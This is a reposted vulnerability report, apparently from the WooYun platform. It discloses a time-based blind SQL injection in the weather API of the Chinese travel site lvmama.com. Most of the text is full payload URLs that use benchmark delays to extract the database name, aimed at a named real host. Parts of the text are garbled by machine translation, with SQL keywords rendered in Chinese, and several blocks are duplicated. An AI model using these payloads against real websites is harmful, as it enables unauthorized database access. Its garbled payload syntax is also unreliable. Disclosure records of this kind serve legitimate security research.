驴妈妈主站某接口注入
漏洞标题 驴妈妈主站某接口注入 相关厂商 驴妈妈旅游网 漏洞作者 路人甲 提交时间 2016-05-04 17:01 公开时间 2016-06-19 14:30 漏洞类型 SQL注射漏洞 危害等级 高…
漏洞标题
驴妈妈主站注入界面
相关制造商
驴妈妈旅行网
漏洞作者
过路人
提交时间
2016-05-04 17: 01
公共时间
2016-06-19 14: 30
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
注射技术
漏洞详细信息
注射点
http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC&callback=jQuery172013711762335151434_1461556777871
使用时间盲方法获取数据
http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(length/**/(database/**/())=12 ,如图1所示,基准/** /(7000000,MD5(1))))和%25271%2527=25271%&安培;回调=jQuery172013711762335151434_1461556777871
延迟约2秒
漏洞证明:
http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(ascii/**/(substr(database/**/()+从+ 1 +为+ 1))> 106,1,基准/** /(7000000,MD5(1))))和%25271%2527=25271%&安培;回调=jQuery172013711762335151434_1461556777871
最后以lmm_weather的形式获取当前数据库
修理计划:
过滤
版权声明:请注明出处。居民A @乌云
http://www.lvmama.com/weather/api/getWeatherByName?name=%E5%8C%97%E4%BA%AC%2527aND(1=if(ascii/**/(substr(database/**/()+从+ 1 +为+ 1))> 106,1,基准/** /(7000000,MD5(1))))和%25271%2527=25271%&安培;回调=jQuery172013711762335151434_1461556777871
最后以lmm_weather的形式获取当前数据库
修理计划:
过滤
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 532 )
- 分类:黑客技术
